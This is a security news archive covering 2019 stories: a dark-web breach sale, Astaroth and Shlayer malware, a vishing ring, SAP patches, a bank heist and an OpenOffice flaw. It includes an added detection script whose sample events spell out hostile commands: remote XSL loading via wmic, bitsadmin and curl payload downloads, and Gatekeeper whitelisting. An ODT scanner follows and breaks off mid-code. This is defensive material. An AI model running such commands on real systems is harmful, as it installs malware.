Category Archives: Pierluigi Paganini

Russia is going to disconnect from the internet as part of a planned test

Russia plans to disconnect the country from the internet as part of an experiment aimed at testing its resilience to cyber attacks intended to isolate it.

Russia plans to disconnect the country from the Internet for a limited period of time to conduct a test aimed at assessing the security of its infrastructure. Russian citizens will be able to reach only Internet resources within the national territory; any resource hosted outside the country will not be reachable.

The news was reported by the Russian news agency RosBiznesKonsalting (RBK); the experiment could be conducted before April 1st.

According to the “National Digital Economy Program” bill submitted to Parliament in 2018, Russian Internet service providers (ISPs) should ensure operations even if nation-state actors carry out cyber attacks to isolate Russia from the Internet. The authorities want to ensure that access to Russian Internet resources is maintained even under attack; to do this, Russian experts are considering a national DNS infrastructure managed by Moscow.

Currently, none of the 12 organizations that operate the DNS root servers worldwide is based in Russia.

ISPs should be able to route traffic through nodes under the control of the Russian Government to allow connections between Russian entities.

Of course, concentrating the traffic through nodes controlled by Moscow could open the door to mass surveillance.

“In addition, Russian telecom firms would also have to install “technical means” to re-route all Russian internet traffic to exchange points approved or managed by Roskomnadzor, Russia’s telecom watchdog.” reported ZDNet.

“Roskomnadzor will inspect the traffic to block prohibited content and make sure traffic between Russian users stays inside the country, and is not re-routed uselessly through servers abroad, where it could be intercepted.”


The experiment has been agreed in a session of the Information Security Working Group at the end of January. The Group includes InfoWatch, MegaFon, Beeline, MTS, RosTelecom, and other major companies in the country.

All internet providers agreed with the law’s goals, but the technical implementation raises many concerns, because experts believe it could cause major disruptions to Russian internet traffic. The goal of the exercise is to observe how the ISPs’ networks would react in this scenario.

“Natalya Kaspersky [President of InfoWatch] confirmed to RBC that at the meeting of the working group, a bill was discussed on the sustainability of the Runet for external shutdown.” reported the RBK agency.

“All participants in the discussion agree that it has good goals, but the mechanisms for its implementation raise many questions and disputes. Moreover, the methods of its implementation have not yet been precisely defined. Therefore, they came to the conclusion that market participants need to organize exercises or something similar in order to understand how this can all be implemented in practice,” said Kaspersky.

According to Finanz.ru, local internet services Mail.ru and Yandex.ru were also supportive of the test.

Pierluigi Paganini

(SecurityAffairs – Russia, Internet)

The post Russia is going to disconnect from the internet as part of a planned test appeared first on Security Affairs.

A new batch of 127 million records appears in the dark web

A new batch of 127 million records has appeared on the dark web; this time the huge trove of data originates from eight companies.

A hacker who goes by the moniker ‘gnosticplayers’ is offering the data for sale on the Dream Market marketplace, asking $14,500 worth of Bitcoin.


Earlier this week, the same seller listed another batch of 620 million accounts coming from 16 other breached websites, including Dubsmash, Armor Games, 500px, Whitepages, and ShareThis.

Like the previous batch, the listing for the latest 127 million records has since been removed from the marketplace; according to the seller, this is to prevent the archives, already purchased by several buyers, from being leaked further.

“All my listings have been removed, to avoid them being bought so many times and being leaked, as a respect for my buyers. But don’t worry, next round of breaches coming soon.” explained the seller in a message left on the black marketplace.

Below is the list of companies whose records are included in the second collection offered for sale on the dark web by gnosticplayers:

  • Ge.tt (1.56 GB, 1.83 million accounts, BTC 0.1609 ($572)) – exposed data include name, password hash, Facebook ID, and referrer. Data were stolen in December 2017.
  • Ixigo (7.23 GB, 18 million accounts, BTC 0.263 ($936)) – exposed data include MD5 password hashes, full name, IP address, username, email addresses, and some passport numbers. Data were stolen in January 2019.
  • Roll20 (759 MB, 4 million accounts, BTC 0.0585 ($208)) – exposed data include names, encrypted passwords, email addresses, and more. Data were stolen in January 2019.
  • Houzz (7.9 GB, 57 million accounts, BTC 2.927 ($10,400)) – exposed data include email addresses, passwords, name, and registration date. Data were stolen in July 2018.
  • Coinmama (101 MB, 486,297 accounts, BTC 0.351 ($1,248)) – exposed data include email addresses, passwords, and more. Data were stolen in August 2017.
  • YouNow (1.3 GB, 40 million accounts, BTC 0.1317 ($468)) – exposed data include full names, IP addresses, email addresses, and social profiles. Data were stolen in October 2017.
  • Stronghold Kingdoms (610 MB, 5 million accounts, BTC 0.2927 ($1,040)) – exposed data include full names, IP addresses, email addresses, and social profiles. Data were stolen in September 2018.
  • PetFlow (200 MB, 1 million accounts, BTC 0.1769 ($634.4)) – exposed data include full names, IP addresses, email addresses, and social profiles. Data were stolen in 2017.

In an exclusive conversation with HackRead, gnosticplayers claimed to be a Pakistani citizen and a hacktivist seeking to improve the image of his country.

“The message is clear, the image the world has of Pakistan is unfair, whereas Pakistani people are the most wonderful people and did nothing wrong. They are persecuted all over the world and people tend to associate this with the whole country. This is false,” gnosticplayers told HackRead.

The hacker has so far put up for sale 24 collections containing a total of 747 million stolen user records.

At the time of writing, only Coffee Meets Bagel, Coinmama, and Houzz had disclosed data breaches, while YouNow and PetFlow claimed that they had not suffered a security breach.


Astaroth Trojan relies on legitimate OS and antivirus processes to steal data

A new Astaroth Trojan campaign was spotted by Cybereason’s Nocturnus team; the hackers are targeting Brazil and European countries.

Researchers at Cybereason’s Nocturnus team have uncovered a new Astaroth Trojan campaign that abuses the Avast antivirus and security software developed by GAS Tecnologia to steal information and drop malicious modules.

“The campaign exploits legitimate operating system processes as well as security vendor products from companies like Avast and GAS Tecnologia to gain information about the target machine and steal password information, as well as keystate information and clipboard usage.” reads the analysis published by Cybereason.

The Astaroth Trojan was first spotted by security firm Cofense in late 2018, when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLBins) such as the command-line interface of Windows Management Instrumentation (WMIC) to download and install malicious payloads in the background. According to the experts, LOLBins are very effective at evading antivirus software.

The new strain analyzed by Cybereason leverages the BITSAdmin and WMIC utilities to contact the command-and-control infrastructure and download the malicious payload.

BITSAdmin is a Windows command-line tool for creating Background Intelligent Transfer Service (BITS) download or upload jobs and monitoring their progress.

The Astaroth Trojan is distributed through spam campaigns; the malicious messages carry a .7zip archive as an attachment or include a hyperlink that points to the archive.

The .7zip archive contains a .lnk file which spawns a wmic.exe process that will “initialize an XSL Script Processing attack”: the /format switch of wmic.exe loads an XSL stylesheet, which can be hosted remotely, and executes any script embedded in it.

The malware uses BITSAdmin to fetch a payload from another command-and-control server; this malicious code is disguised as images or extension-less files and contains various Astaroth modules.


The malware also loads a malicious module through aswrundll.exe, the Avast Software Runtime Dynamic Link Library loader used by the Avast antivirus. This code is used to gather information about the compromised system and to load extra modules.

The choice of Avast is effective because the Avast engine is one of the most widely deployed antivirus products in the world. Avast pointed out that this is neither code injection nor privilege escalation: the attackers use an Avast file to run a binary in much the same way that rundll32.exe runs a DLL on Windows. Avast has issued a detection for the malware and plans to change its environment so that the same process cannot be misused in this way in the future.

The Astaroth Trojan sample analyzed by the experts also abuses the unins000.exe process of a security solution developed by GAS Tecnologia.

The malware is able to log the user’s keystrokes, collect information through hooking, access clipboard content, and monitor the key state.

The Astaroth Trojan also uses the NetPass free network password recovery tool to collect login passwords of remote computers on the LAN, passwords of mail accounts on an exchange server stored by Microsoft Outlook, and passwords of MSN Messenger and Windows Messenger accounts.

“Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above.” concludes Cybereason.

“LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.”


Group-IB helped to arrest phone scammers profiting off the backs of the Russian elderly

Moscow police department operatives, with the participation of Group-IB experts, took down a group of phone scammers who for several years have been extorting money from the elderly.

The phone scammers typically stole between 450 and 4,500 USD per victim by promising substantial compensation for earlier purchases of medicines, medical devices or dietary supplements. According to the investigation, in just seven fraud episodes the damage is estimated at 150,000 USD, and the police believe that the number of victims is much higher.

At the end of 2018, employees of the Moscow Department of Internal Affairs came across the trail of a group of telephone scammers who had long been involved in fraud, extracting large sums of money from Russian elderly people. The money was used to purchase real estate, cars, collectors’ coins, jewellery and securities. According to the investigation, the scheme was invented and conducted by a 35-year-old resident of Domodedovo originally from the Republic of Azerbaijan. In addition to the leader, the group was made up of “callers” who communicated with pensioners over the phone, “cashiers” who controlled transactions, “money mules” who withdrew cash from ATMs, and even a dedicated person responsible for the relevance and security of the database of phone numbers of potential victims.

Where did the phone scammers get this data from? They profited from a scam, popular some time before, which sold “magic pills”: counterfeit drugs and dietary supplements purported to cure even serious chronic diseases. This scam’s elderly victims spent hundreds or thousands of dollars on the products, borrowing from friends and taking loans. The database of these names, phone numbers and the cost of the “drugs” ordered ended up in the hands of the phone scammers. According to Group-IB experts, the list held the names of about 1,500 pensioners, their phone numbers, and the names and prices of the medicines they trustingly purchased. Judging by the database, these potential victims were between the ages of 70 and 84, and were from Moscow, Rostov, Tomsk, Nizhny Novgorod, Leningrad, Chelyabinsk, Orenburg and other regions. They had at different times bought expensive drugs, including: “Weian capsules” (2287 USD), “Flollrode aqueous” (1600 USD), “Miracle patches” (313 USD), applicators (170 USD), “Lun Jiang” (157 USD), and “Black nut” (388 USD).

For those who were suspicious of the compensation process, the “prosecutor of Moscow” offered to have the “head of the financial department of a bank” confirm the information. After that, the victim was contacted by another person, “a representative of a credit and financial organization”, who confirmed his willingness to transfer the compensation to the pensioner’s account or to hand over the money in cash. Once the victim agreed, “tax officers” entered the negotiations and reported that the victim needed to make an advance payment of 15% of the compensation as a tax. In addition, the scammers were able to collect an “insurance premium” or a “lawyer’s tax”.

For example, one of the pensioners, who was promised a compensation of 8,660 USD, was required to pay a tax of 747 USD. In another case, a payment of 448 USD was demanded for the receipt of 4,480 USD in compensation. One of the victims was a famous opera singer who paid the scammers about 4,480 USD. The elderly people transferred the money to the cards of “cashiers”, the “drops” or “money mules” indicated by the attackers, who then withdrew the money from ATMs.

“Despite the fact that vishing (voice phishing) is a rather old type of phone fraud, it remains popular because attackers come up with new methods of deception, targeted at the most vulnerable segments of the population, pensioners,” highlights Sergey Lupanin, Head of the Group-IB Investigation Department. “For years, deceived elderly people have repeatedly complained about telephone scams to the Russian Central Bank, the Ministry of Finance and the Prosecutor’s Office, and regulatory and law enforcement agencies have periodically issued warnings about these dangerous and very cynical fraudulent schemes, but the number of victims did not decrease. The scammers not only maintained secrecy but also improved their methods of social engineering: they quickly gained their victims’ trust, showed themselves to be intelligent and educated, and were persistent and aggressive. It’s rare for one of their victims to escape unscathed.”

(Image source: The Express)

However, as a result of a large-scale police operation, the organized criminal group was dismantled: on 5 February, several detentions and searches were carried out at the criminals’ places of residence. A police search of the apartment of the scheme’s organizer turned up large sums of money in roubles and other currencies, bank cards, a traumatic gun, a hunting rifle and collectible coins. The scammer had invested the money received in shares of Russian companies. In his stash inside a toilet, field investigators found database printouts with names of pensioners as well as extracts with phone numbers and names of victims that the criminal’s girlfriend had tried to flush. In a private house belonging to another detainee, the leader of the money mules, a police search turned up bank cards, databases of pensioners, accounting records of the criminal activity, money, and jewellery.

A total of seven people were detained. According to the investigation, the damages from 7 episodes of fraud are estimated at 150 000 USD, but operatives believe that the number of victims is much higher — at least 30 people. An investigation is underway.

About the author: Group-IB is one of the leading providers of solutions aimed at the detection and prevention of cyberattacks, online fraud, and IP protection.


Coffee Meets Bagel dating app confirms data breach

The week closes with the news of another embarrassing data breach: Coffee Meets Bagel confirmed a hack on Valentine’s Day.

The dating app Coffee Meets Bagel confirmed on Valentine’s Day that hackers had breached its systems and may have obtained access to users’ account data.

The company notified account holders of the incident; the intrusion was discovered after an archive containing user data was offered for sale on the dark web for roughly $20,000 worth of Bitcoin.

Earlier this week, The Register revealed in an exclusive that some 617 million online account details stolen from 16 hacked websites were available for sale on the dark web. Coffee Meets Bagel learned of the incident on Feb. 11, 2019.

The advertisement for the sale of the huge trove of data was published on the popular Dream Market black marketplace; the data were available for less than $20,000 worth of Bitcoin.

Data was collected from data breaches of popular websites including:

  • Dubsmash (162 million);
  • MyFitnessPal (151 million);
  • MyHeritage (92 million);
  • ShareThis (41 million);
  • HauteLook (28 million);
  • Animoto (25 million);
  • EyeEm (22 million);
  • 8fit (20 million);
  • Whitepages (18 million);
  • Fotolog (16 million);
  • 500px (15 million);
  • Armor Games (11 million);
  • BookMate (8 million);
  • CoffeeMeetsBagel (6 million);
  • Artsy (1 million);
  • DataCamp (700,000).

While some of the above websites are known to have been hacked (e.g. MyHeritage, MyFitnessPal), for some of them, including Coffee Meets Bagel, this is the first time the security community has been informed of their breaches.

Journalists at The Register have analyzed account records and confirmed they appear to be legit. Spokespersons for MyHeritage and 500px confirmed the authenticity of the data.

According to The Register, data belonging to 6.17 million Coffee Meets Bagel accounts (673 MB of data) were offered for sale. The data appear to date from late 2017 and mid-2018.

“As always, we recommend you take extra caution against any unsolicited communications that ask you for your personal data or refer you to a web page asking for personal data,” reads the email sent by the company to its users. “We also recommend avoiding clicking on links or downloading attachments from suspicious emails.”

Stolen records include name, email address, age, registration date, and gender, but the data breach notification issued by Coffee Meets Bagel only reports that names and email addresses registered prior to May 2018 were exposed.

According to the company, no financial data were exposed because it does not store such data.

Coffee Meets Bagel hired a forensic firm to investigate the incident and assess its systems; at this time it is not clear how the hackers breached the company. It has also started an audit of vendor and external systems.


Germany makes its cyber capabilities available for NATO alliance

Germany announced it is going to make its cyber capabilities available for the NATO alliance to help fight hacking and electronic warfare.

Germany is going to share its cyber warfare capabilities with the NATO alliance to help protect its members against hacking and electronic warfare.

During the 2016 Warsaw Summit, NATO officially recognised cyberspace as a military operational domain. This means that the alliance could respond with conventional weapons to a severe cyber attack, confirming that the Internet is a new battlefield.
Each Ally is committed to improving its resilience to cyber attacks and its ability to respond promptly to them, including in hybrid contexts. The Alliance aims to expand the scope of the NATO Cyber Range to help allies improve their cyber capabilities and share information on threats and best practices.

NATO fears both nation-state hacking and attacks carried out by cyber criminals; their activities are becoming ever more intense and demand a proper response from the alliance.

“NATO has designated cyberspace as a conflict domain alongside land, sea and air and says electronic attacks by the likes of Russia and China — but also criminals and so-called “hacktivists” — are becoming more frequent and more destructive.” reads a post published by AFP press.


During a meeting of defence ministers held in Brussels on Thursday, Germany told allies that it would make both its defensive and offensive cyber capabilities available.

“Just as we provide army, air force and naval forces to NATO, we are now also in a position to provide NATO capabilities on the issue of cyber within the national and legal framework that we have,” German Defence Minister Ursula von der Leyen said.

Germany is not alone, the US, Britain, Denmark, the Netherlands and Estonia have all announced the availability of their offensive cyber capabilities to the alliance.

NATO members hope that the announced sharing of offensive capabilities will act as a deterrent to threat actors.

Members of the alliance, which already share conventional military means, aim to share their cyber capabilities for NATO missions and operations.

Potential targets of these operations include any connected system, ranging from computers and mobile devices to industrial control systems in critical infrastructure.

“In a sign of the growing importance NATO countries attach to the cyber battlefield, this year Britain said it would spend 65 million pounds (74 million euros/$83 million) on offensive capabilities.” concludes AFP.


Experts spotted a new strain of Shlayer macOS Malware

Security experts at Carbon Black have recently discovered a new strain of the Shlayer malware that targets macOS versions.

Security experts at Carbon Black have recently spotted a new strain of the Shlayer malware that targets macOS versions from 10.10.5 up to 10.14.3.

The malware poses as an Adobe Flash update and is distributed through a large number of websites, both fake domains and compromised legitimate ones.


“AU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily disguised as an Adobe Flash software update.” reads the analysis published by Carbon Black.

“Many of the sites that we have found to redirect to these fake updates have been those masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from malvertisements on legitimate sites.”

This variant of the Shlayer malware employs multiple levels of obfuscation; the experts also discovered that many of the initial DMGs are signed with a legitimate Apple developer ID.

The malware uses legitimate system applications via bash to conduct all installation activity.

Once the installer is launched, a .command script is executed from a hidden directory in the mounted volume. The script is base64-decoded and AES-decrypted, revealing a second script that contains yet another encoded script, which is then executed.

The first stage malware gathers system information, including macOS version and UUID, generates a “Session GUID” using uuidgen, creates a custom URL using the harvested data, and then downloads the second stage payload. 

The malicious script downloads a password-protected ZIP file using curl, creates a directory in /tmp to store the ZIP file, and unzips it there.

The script then makes the binary inside the unzipped .app executable with chmod +x, runs the payload with specific arguments, and finally runs killall Terminal to close the terminal window the script is running in.


“After the second stage payload is downloaded and executed, it attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline as discussed in Patrick Wardle’s DEFCON 2017 talk “Death by 1000 Installers”.” continues the analysis.

“Once the malware has elevated to root privileges, it attempts to download additional software (observed to be adware in the analyzed samples) and disables Gatekeeper for the downloaded software using spctl.”

By whitelisting the downloaded software with spctl, the malware can run it without user intervention even when Gatekeeper is configured to block unidentified applications downloaded from the internet.

Carbon Black’s analysis includes Indicators of Compromise.
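Both the Astaroth post above (.lnk spawning wmic.exe with /format, BITSAdmin downloads, aswrundll.exe and unins000.exe loading attacker modules) and this Shlayer post (.command script, curl to /tmp, unzip -P, chmod +x, killall Terminal, sudo via security_authtrampoline, spctl whitelisting) describe chains of individually legitimate processes whose combination in one session is the signal. The triage script below is an added example, not code from Cybereason, Carbon Black or the author: it runs command-line rules over Sysmon/EDR-style process-creation events and correlates hits per (host, session). The event schema, host names, session ids, 203.0.113.x addresses, paths and the "user-writable module path" heuristic for the Avast/GAS binaries are all assumptions of this example, and every sample event is constructed.

```python
"""Process-creation log triage for the Astaroth and Shlayer LOLBin chains.

Added example, not Cybereason's or Carbon Black's code. Each event is an
EDR/Sysmon-style process-creation record reduced to the fields the rules use:
host, session (the logon or terminal session the process belongs to), os,
image and cmdline. Every sample event, host name, IP address and path below
is constructed for this demonstration.
"""
import re
from collections import defaultdict


def _basename(image):
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _is(event, *names):
    return _basename(event["image"]) in names


def _has(event, pattern):
    return re.search(pattern, event["cmdline"], re.IGNORECASE) is not None


# (rule name, platform, predicate). Windows rules follow the Astaroth chain
# (.lnk -> wmic /format XSL -> bitsadmin download -> AV binary loading a module);
# macOS rules follow the Shlayer installer (.command -> curl to /tmp -> unzip -P
# -> chmod +x -> killall Terminal -> security_authtrampoline -> spctl).
RULES = [
    # wmic /format: loads an XSL stylesheet, local or remote, and executes the
    # script embedded in it; a URL or .xsl path after the switch is the tell.
    ("wmic_xsl_script", "windows",
     lambda e: _is(e, "wmic.exe")
     and _has(e, r'/format\s*:\s*"?(https?://|[^\s"]*\.xsl)')),
    ("bitsadmin_download", "windows",
     lambda e: _is(e, "bitsadmin.exe") and _has(e, r"/(transfer|addfile)\b")),
    # Avast's aswrundll.exe or GAS Tecnologia's unins000.exe handed a module
    # from a user-writable directory (heuristic; an assumption of this example).
    ("av_binary_proxy", "windows",
     lambda e: _is(e, "aswrundll.exe", "unins000.exe")
     and _has(e, r"\\(users|programdata|temp)\\")),
    ("curl_to_tmp", "macos",
     lambda e: _is(e, "curl") and _has(e, r"(-o|--output)\s+/tmp/")),
    ("unzip_protected_tmp", "macos",
     lambda e: _is(e, "unzip") and _has(e, r"\s-P\s") and _has(e, r"/tmp/")),
    ("chmod_exec_tmp", "macos",
     lambda e: _is(e, "chmod") and _has(e, r"\+x") and _has(e, r"/tmp/")),
    ("killall_terminal", "macos",
     lambda e: _is(e, "killall") and _has(e, r"\bTerminal\b")),
    # sudo running the AuthorizationExecuteWithPrivileges trampoline.
    ("authtrampoline_sudo", "macos",
     lambda e: _has(e, r"/usr/libexec/security_authtrampoline")),
    # Gatekeeper switched off, or a downloaded path whitelisted.
    ("spctl_gatekeeper", "macos",
     lambda e: _is(e, "spctl") and _has(e, r"--(master-disable|add|disable)\b")),
]


def match_rules(event):
    """Names of the rules an event triggers, in RULES order."""
    return [n for n, plat, pred in RULES if plat == event["os"] and pred(event)]


def triage(events, min_stages=2):
    """Group hits by (host, session). Sessions with at least min_stages distinct
    stages are returned as chains; lone hits are returned separately so that a
    single wmic /format or security_authtrampoline still gets a look."""
    stages = defaultdict(set)
    for e in events:
        for name in match_rules(e):
            stages[(e["host"], e["session"])].add(name)
    chains = {k: sorted(v) for k, v in stages.items() if len(v) >= min_stages}
    singles = {k: sorted(v) for k, v in stages.items() if len(v) < min_stages}
    return chains, singles


def _ev(host, session, os_, image, cmdline):
    return {"host": host, "session": session, "os": os_, "image": image, "cmdline": cmdline}


SAMPLE_EVENTS = [  # constructed telemetry, not captured from a real incident
    # WKS01, session s1: Astaroth-style chain started from a .lnk in a 7z archive
    _ev("WKS01", "s1", "windows", r"C:\Windows\System32\wbem\wmic.exe",
        r'wmic.exe os get /format:"https://203.0.113.7/v.xsl"'),
    _ev("WKS01", "s1", "windows", r"C:\Windows\System32\bitsadmin.exe",
        r"bitsadmin /transfer upd /download /priority high https://203.0.113.7/logo.png C:\Users\ana\AppData\Local\Temp\m.dll"),
    _ev("WKS01", "s1", "windows", r"C:\Program Files\AVAST Software\Avast\aswrundll.exe",
        r'"C:\Program Files\AVAST Software\Avast\aswrundll.exe" C:\Users\ana\AppData\Local\Temp\m.dll'),
    # WKS01, session s2: an administrator's benign inventory commands
    _ev("WKS01", "s2", "windows", r"C:\Windows\System32\wbem\wmic.exe", "wmic os get caption,version"),
    _ev("WKS01", "s2", "windows", r"C:\Windows\System32\bitsadmin.exe", "bitsadmin /list /allusers"),
    # WKS02, session s5: a lone wmic /format pointing at a local stylesheet
    _ev("WKS02", "s5", "windows", r"C:\Windows\System32\wbem\wmic.exe",
        r'wmic.exe process list /format:"C:\Users\bob\Downloads\style.xsl"'),
    # mbp-07, session t9: Shlayer-style installer run from one Terminal window
    _ev("mbp-07", "t9", "macos", "/usr/bin/curl", "curl -fsL -o /tmp/4f2c/p.zip https://203.0.113.9/dl?id=4f2c"),
    _ev("mbp-07", "t9", "macos", "/usr/bin/unzip", "unzip -P 4f2c /tmp/4f2c/p.zip -d /tmp/4f2c"),
    _ev("mbp-07", "t9", "macos", "/bin/chmod", "chmod +x /tmp/4f2c/Player.app/Contents/MacOS/Player"),
    _ev("mbp-07", "t9", "macos", "/usr/bin/killall", "killall Terminal"),
    _ev("mbp-07", "t9", "macos", "/usr/bin/sudo",
        "sudo /usr/libexec/security_authtrampoline /tmp/4f2c/Player.app/Contents/MacOS/Player auth 17"),
    _ev("mbp-07", "t9", "macos", "/usr/sbin/spctl", "spctl --add /tmp/4f2c/Player.app"),
    # mbp-07, session t3: a user saving a file to their Downloads folder
    _ev("mbp-07", "t3", "macos", "/usr/bin/curl", "curl -o /Users/sam/Downloads/report.pdf https://example.org/report.pdf"),
]

if __name__ == "__main__":
    chains, singles = triage(SAMPLE_EVENTS)
    print("chains:", chains, "\nsingles:", singles)
```

Run as-is, the two attack sessions come back as chains with three and six stages respectively, the administrator's wmic and bitsadmin usage produces no hit at all, and the lone local-stylesheet wmic call lands in the singles list for manual review. Tuning the rules is a matter of adding a tuple to RULES; keying the correlation on a session rather than on a parent PID is what keeps the macOS chain together, since each stage there is a separate child of the same shell.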


SAP security fixes address Critical flaw in SAP HANA XSA

SAP released a collection of security fixes for February 2019 that address 13 vulnerabilities in its products, including a Hot News flaw in SAP HANA XSA.

This week SAP addressed 13 vulnerabilities in its products with the release of the February 2019 set of security fixes, including a Hot News flaw in SAP HANA Extended Application Services (XSA), advanced model.

SAP Security Patch Day for February 2019 includes 13 Security Notes and 3 updates to previously released security notes. 2 Notes are rated Hot News, 4 rated High priority, and 10 rated Medium priority.

“On 12th of February 2019, SAP Security Patch Day saw the release of 13 Security Notes. Additionally, there were 3 updates to previously released security notes.” reads the advisory published by SAP.

The fixes address flaws in the following SAP products: Business Client, HANA XSA, ABAP Platform (SLD Registration), Disclosure Management, Solution Tools Plug-In (ST-PI), Note Assistant, Business Objects, Manufacturing Integration and Intelligence, Business One Mobile Android App, and WebIntelligence BILaunchPad (Enterprise).

The most severe issue is a Hot News Note (CVSS score of 9.8) that updates a Security Note released on the April 2018 Patch Day and includes security updates for the Chromium browser control delivered with SAP Business Client.

“As mentioned, one of the two SAP Security Notes tagged as HotNews (#2742027) affects SAP HANA XSA (the other one is #2622660 that is regularly updated with Chromium security updates and was explained in a previous blog post). It is a classic Missing Authorization Check that may allow an attacker not only to read/modify/delete sensitive information, but also to gain high-privileged functionalities.” reads the analysis published by Onapsis.

“It affects XS Advanced selected versions in both SAP HANA 1 and SAP HANA 2 and can be patched by upgrading the XS Advanced component.”

The second Hot News Note addresses a missing authorization check in HANA XSA that could be exploited by an attacker to gain access to high-privileged functionalities, including the ability to read, modify, or delete sensitive information.

The security vulnerability affects XS Advanced selected versions in SAP HANA 1 and SAP HANA 2.

To address the flaw, customers should upgrade the XS Advanced component. SAP also provided a workaround that consists of disabling the component, if not in use. 

The SAP Security Patch Day for February 2019 also addressed another issue in SAP HANA XSA that could lead to information disclosure; it was rated Medium severity (CVSS score of 6.8).

SAP addressed several High priority Security Notes including an XML External Entity (XXE) vulnerability in SLD Registration of ABAP Platform, Missing Authorization check in Disclosure Management, and access to Easy Access Menu in ABAP Platform. 

SAP also issued an update to a security note released on the November 2014 Patch Day concerning a potential information disclosure relating to the database server file system.

Onapsis also published a summary of the types of vulnerabilities addressed in February, including another six that were published in late January, after that month’s Security Notes Patch Day.


Bank of Valletta shut down its operations after a cyber attack

Bank of Valletta, the largest bank in Malta, was hit by a cyber attack in which attackers attempted to steal 13 million euros ($14.7 million).


Bank of Valletta, the largest bank in Malta, which accounts for almost half of the banking transactions in the country, had to shut down its operations on Wednesday after hackers attempted to withdraw 13 million euros ($14.7 million).

The news was confirmed by Prime Minister Joseph Muscat: hackers broke into the systems of the bank and attempted to transfer the funds overseas. Muscat told parliament that the threat actors tried to move the funds to banks in the Czech Republic, Hong Kong, Britain, and the US.

“The reason for my statement is to put people’s minds at rest that their money is safe in the bank,” Muscat insisted, adding that BOV was an important cog in the Maltese economy.

“It is no joke having a bank that controls half the economy shut down for a whole business day but at this stage caution trumped every other consideration,”


The Government of Malta is the largest shareholder of the Bank of Valletta, the financial institution shut down its systems, closed branches and ATMs, and suspended mobile and Internet banking and internal email.

After the disclosure of the attack, the website of the bank also went offline.

“Prime Minister Joseph Muscat told parliament the cyber attack involved the creation of false international payments totaling 13 million euros ($14.7 million) to banks in Britain, the United States, the Czech Republic and Hong Kong.” reported the Reuters.

“The funds have been traced and the Bank of Valletta is seeking to have the fraudulent transactions reversed.”

Customer accounts were not affected, and services will be restored as soon as possible.

The authorities traced the transactions, and the bank is seeking to have them reversed.

The bank is working with local and international police authorities to investigate the case.

“During routine reconciliations that the Bank carries out regularly, it was noticed that there were discrepancies in eleven payments having a total value of around EUR 13 million emanating from the Bank’s foreign payment accounts. The Bank took immediate steps to address this issue by requesting the international banks involved to stop these payments,” the bank said in a statement reported by MaltaToday.

Pierluigi Paganini

(SecurityAffairs – Bank of Valletta, hacking)

The post Bank of Valletta shut down its operations after a cyber attack appeared first on Security Affairs.

0patch released micropatch for code execution flaw in OpenOffice

Experts at ACROS Security’s 0patch released an unofficial patch for a recently disclosed remote code execution vulnerability in the Apache OpenOffice suite.

ACROS Security’s 0patch released an unofficial patch for a path traversal flaw recently disclosed in the Apache OpenOffice suite.

Security researcher Alex Inführ discovered a severe remote code execution vulnerability in LibreOffice and Apache OpenOffice that could be exploited by tricking victims into opening an ODT (OpenDocument Text) file with an embedded event handler.

“I started to have a look at Libreoffice and discovered a way to achieve remote code execution as soon as a user opens a malicious ODT file and moves his mouse over the document, without triggering any warning dialog.” reads the blog post published by Inführ.

The flaw could have a huge impact because the popular free, open source office suite is used by millions of Windows, MacOS and Linux users.


The expert discovered that it is possible to abuse the OpenDocument scripting framework by adding an onmouseover event to a link included in the ODT file.

Inführ devised an attack that relies on a directory traversal vulnerability tracked as CVE-2018-16858. By exploiting it, a hidden onmouseover event can trigger the automatic execution of a specific Python library shipped with the suite.
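As an added example (not code from the article, from Inführ or from 0patch), the Python scanner below triages an ODT for script event listeners of the kind described above: it unpacks the archive, lists every listener in content.xml with its DOM event and target, and flags targets that climb out with “..” segments or select the Python script provider. The ODF namespaces, the `build_sample_odt` helper and the placeholder hrefs are this example's own assumptions.

```python
"""Added example: triage an ODT for script event listeners that reach outside
the document. Not the article's, Inführ's or 0patch's code; the ODF 1.2
namespaces and the placeholder hrefs below are assumptions made for the demo."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote
from xml.sax.saxutils import escape

# Minimal content.xml: one hyperlink with one script event listener attached.
ODF_CONTENT_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content
  xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
  xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
  xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"
  xmlns:xlink="http://www.w3.org/1999/xlink">
 <office:body><office:text><text:p>
  <text:a xlink:type="simple" xlink:href="https://example.invalid/">
   <office:event-listeners>
    <script:event-listener script:language="ooo:script"
      script:event-name="{event}" xlink:type="simple" xlink:href="{href}"/>
   </office:event-listeners>link</text:a>
 </text:p></office:text></office:body>
</office:document-content>
"""

# '..' as a whole path segment, right after the scheme colon or a separator.
_DOTDOT = re.compile(r"(?<![^:/\\])\.\.(?=[/\\]|$)")


def build_sample_odt(href: str, event: str = "dom:mouseover") -> bytes:
    """Constructed ODT (a ZIP with mimetype + content.xml) for testing."""
    doc = ODF_CONTENT_TEMPLATE.format(event=escape(event, {'"': "&quot;"}),
                                      href=escape(href, {'"': "&quot;"}))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", doc)
    return buf.getvalue()


def _local(name: str) -> str:
    """Drop the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def scan_odt(odt_bytes: bytes) -> list:
    """One finding per event-listener element in content.xml or styles.xml."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(odt_bytes)) as zf:
        for part in ("content.xml", "styles.xml"):
            if part not in zf.namelist():
                continue
            for el in ET.fromstring(zf.read(part)).iter():
                if _local(el.tag) != "event-listener":
                    continue
                attrs = {_local(k): v for k, v in el.attrib.items()}
                href = unquote(attrs.get("href", ""))  # undo %2e%2e-style escaping
                findings.append({
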